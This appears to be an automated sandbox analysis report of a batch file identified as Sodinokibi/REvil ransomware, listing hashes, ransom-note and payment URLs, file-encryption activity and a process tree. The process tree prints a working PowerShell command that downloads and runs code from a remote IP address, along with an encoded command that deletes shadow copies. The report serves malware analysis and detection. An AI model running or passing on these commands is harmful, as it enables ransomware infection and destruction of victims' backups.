Analysis
Max time kernel: 150s
Max time network: 155s
Platform: windows7_x64
Resource: win7v191014
Submitted: 11-02-2020 19:10
Static task: static1
Behavioral task: behavioral1 (Sample: hBjM939D.bat, Resource: win7v191014)
Behavioral task: behavioral2 (Sample: hBjM939D.bat, Resource: win10v191014)
General
Target: hBjM939D.bat
Size: 198B
MD5: 31f14e4e5545659b2edf91aedb0830cb
SHA1: e5489bc5f3b8f118e6fb0ba7f5f4a0223a33863a
SHA256: 2f3a2162c69c2185edadd4cc4d60b0ef9f2d212d2d710f30e012b9878aefc0f1
SHA512: 80298267b14e688189cfefabed44496c5c22a51c50c788ac72ed1b9ad4ab1848068308f1a7990665ebba4220a428cdb7a1a5695a3643ea395af7566726914562
Malware Config
Extracted: http://185.103.242.78/pastes/hBjM939D
Extracted: C:\s0ks9v-readme.txt
  Family: sodinokibi
  http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/2F57540029B6714A
  http://decryptor.cc/2F57540029B6714A
Signatures

Suspicious use of AdjustPrivilegeToken (6 IoCs)
Processes: powershell.exe, powershell.exe, vssvc.exe
  Description                 PID   Process
  Token: SeDebugPrivilege     1356  powershell.exe
  Token: SeDebugPrivilege     1356  powershell.exe
  Token: SeDebugPrivilege     1900  powershell.exe
  Token: SeBackupPrivilege    1220  vssvc.exe
  Token: SeRestorePrivilege   1220  vssvc.exe
  Token: SeAuditPrivilege     1220  vssvc.exe
Blacklisted process makes network request (3 IoCs)
Processes: powershell.exe
  Flow  PID   Process
  7     1356  powershell.exe
  12    1356  powershell.exe
  14    1356  powershell.exe
Modifies service (2 TTPs, 4 IoCs)
Processes: vssvc.exe
  Description  IoC                                                                                  Process
  Key created  \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\COM+ REGDB Writer                vssvc.exe
  Key created  \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\ASR Writer                       vssvc.exe
  Key created  \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\Shadow Copy Optimization Writer  vssvc.exe
  Key created  \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\Registry Writer                  vssvc.exe
Drops file in Program Files directory (33 IoCs)
Processes: powershell.exe
  Description                   IoC                                                                                    Process
  File renamed                  C:\Program Files\ConvertFromGet.xla => \??\c:\program files\ConvertFromGet.xla.s0ks9v  powershell.exe
  File opened for modification  \??\c:\program files\ImportLimit.rm                                                   powershell.exe
  File opened for modification  \??\c:\program files\ConvertFromGet.xla                                               powershell.exe
  File opened for modification  \??\c:\program files\PublishCopy.ppt                                                  powershell.exe
  File opened for modification  \??\c:\program files\RegisterJoin.vsd                                                 powershell.exe
  File created                  \??\c:\program files\microsoft sql server compact edition\v3.5\s0ks9v-readme.txt      powershell.exe
  File renamed                  C:\Program Files\ConfirmUpdate.mpeg2 => \??\c:\program files\ConfirmUpdate.mpeg2.s0ks9v  powershell.exe
  File renamed                  C:\Program Files\ImportLimit.rm => \??\c:\program files\ImportLimit.rm.s0ks9v          powershell.exe
  File renamed                  C:\Program Files\PublishCopy.ppt => \??\c:\program files\PublishCopy.ppt.s0ks9v        powershell.exe
  File renamed                  C:\Program Files\JoinMove.vbs => \??\c:\program files\JoinMove.vbs.s0ks9v              powershell.exe
  File opened for modification  \??\c:\program files\UnprotectWait.html                                               powershell.exe
  File opened for modification  \??\c:\program files\UnregisterEnable.ods                                             powershell.exe
  File renamed                  C:\Program Files\UnprotectWait.html => \??\c:\program files\UnprotectWait.html.s0ks9v  powershell.exe
  File created                  \??\c:\program files\s0ks9v-readme.txt                                                powershell.exe
  File renamed                  C:\Program Files\PushFormat.jpe => \??\c:\program files\PushFormat.jpe.s0ks9v          powershell.exe
  File renamed                  C:\Program Files\WaitDebug.mhtml => \??\c:\program files\WaitDebug.mhtml.s0ks9v        powershell.exe
  File opened for modification  \??\c:\program files\PushFormat.jpe                                                   powershell.exe
  File renamed                  C:\Program Files\UseSkip.xps => \??\c:\program files\UseSkip.xps.s0ks9v                powershell.exe
  File created                  \??\c:\program files\microsoft sql server compact edition\v3.5\desktop\s0ks9v-readme.txt  powershell.exe
  File opened for modification  \??\c:\program files\WaitDebug.mhtml                                                  powershell.exe
  File renamed                  C:\Program Files\DebugRevoke.txt => \??\c:\program files\DebugRevoke.txt.s0ks9v        powershell.exe
  File created                  \??\c:\program files\microsoft sql server compact edition\s0ks9v-readme.txt           powershell.exe
  File opened for modification  \??\c:\program files\StepConnect.temp                                                 powershell.exe
  File renamed                  C:\Program Files\StepConnect.temp => \??\c:\program files\StepConnect.temp.s0ks9v      powershell.exe
  File opened for modification  \??\c:\program files\ConfirmUpdate.mpeg2                                              powershell.exe
  File opened for modification  \??\c:\program files\MountBlock.xltx                                                  powershell.exe
  File renamed                  C:\Program Files\MountBlock.xltx => \??\c:\program files\MountBlock.xltx.s0ks9v        powershell.exe
  File renamed                  C:\Program Files\UnregisterEnable.ods => \??\c:\program files\UnregisterEnable.ods.s0ks9v  powershell.exe
  File opened for modification  \??\c:\program files\DebugRevoke.txt                                                  powershell.exe
  File opened for modification  \??\c:\program files\JoinMove.vbs                                                     powershell.exe
  File renamed                  C:\Program Files\RegisterJoin.vsd => \??\c:\program files\RegisterJoin.vsd.s0ks9v      powershell.exe
  File opened for modification  \??\c:\program files\UseSkip.xps                                                      powershell.exe
  File created                  \??\c:\program files (x86)\s0ks9v-readme.txt                                          powershell.exe
Modifies system certificate store
Processes: powershell.exe
  Description       IoC                                                                                                                  Process
  Set value (data)  \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13\Blob = 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  powershell.exe
  Key created       \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13  powershell.exe
Sets desktop wallpaper using registry (2 TTPs, 1 IoC)
Processes: powershell.exe
  Description      IoC                                                                                                                                            Process
  Set value (str)  \REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\4uve.bmp"  powershell.exe
Suspicious behavior: CmdExeWriteProcessMemorySpam (1 IoC)
Processes: powershell.exe
  PID   Process
  1356  powershell.exe
Suspicious use of WriteProcessMemory (5 IoCs)
Processes: cmd.exe, powershell.exe
  Description                        PID   Process         Target process
  PID 1100 wrote to memory of 1356   1100  cmd.exe         powershell.exe
  PID 1356 wrote to memory of 1900   1356  powershell.exe  powershell.exe
  PID 1356 wrote to memory of 1900   1356  powershell.exe  powershell.exe
  PID 1356 wrote to memory of 1900   1356  powershell.exe  powershell.exe
  PID 1356 wrote to memory of 1900   1356  powershell.exe  powershell.exe
Suspicious behavior: EnumeratesProcesses (5 IoCs)
Processes: powershell.exe, powershell.exe
  PID   Process
  1356  powershell.exe
  1356  powershell.exe
  1356  powershell.exe
  1900  powershell.exe
  1900  powershell.exe
Sodin, Sodinokibi, REvil
Ransomware with advanced anti-analysis and privilege escalation functionality
Discovering connected drives (3 TTPs, 7 IoCs)
Processes: powershell.exe, cmd.exe, powershell.exe
  Description              IoC     Process
  File opened (read-only)  \??\B:  powershell.exe
  File opened (read-only)  \??\E:  powershell.exe
  File opened (read-only)  \??\C:  cmd.exe
  File opened (read-only)  \??\C:  powershell.exe
  File opened (read-only)  \??\F:  powershell.exe
  File opened (read-only)  \??\C:  powershell.exe
  File opened (read-only)  \??\A:  powershell.exe
Processes

C:\Windows\system32\cmd.exe
  Command line: cmd /c "C:\Users\Admin\AppData\Local\Temp\hBjM939D.bat"
  PID: 1100
  - Suspicious use of WriteProcessMemory
  - Discovering connected drives

  C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    Command line: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "IEX (New-Object System.Net.WebClient).DownloadString('http://185.103.242.78/pastes/hBjM939D');Invoke-MHYLWDFAYARXBSG;Start-Sleep -s 10000"
    PID: 1356
    - Suspicious use of AdjustPrivilegeToken
    - Blacklisted process makes network request
    - Drops file in Program Files directory
    - Modifies system certificate store
    - Sets desktop wallpaper using registry
    - Suspicious behavior: CmdExeWriteProcessMemorySpam
    - Suspicious use of WriteProcessMemory
    - Suspicious behavior: EnumeratesProcesses
    - Discovering connected drives

    C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      Command line: powershell -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==
      (the -e argument decodes from UTF-16LE base64 to: Get-WmiObject Win32_Shadowcopy | ForEach-Object {$_.Delete();})
      PID: 1900
      - Suspicious use of AdjustPrivilegeToken
      - Suspicious behavior: EnumeratesProcesses
      - Discovering connected drives

C:\Windows\system32\vssvc.exe
  Command line: C:\Windows\system32\vssvc.exe
  PID: 1220
  - Suspicious use of AdjustPrivilegeToken
  - Modifies service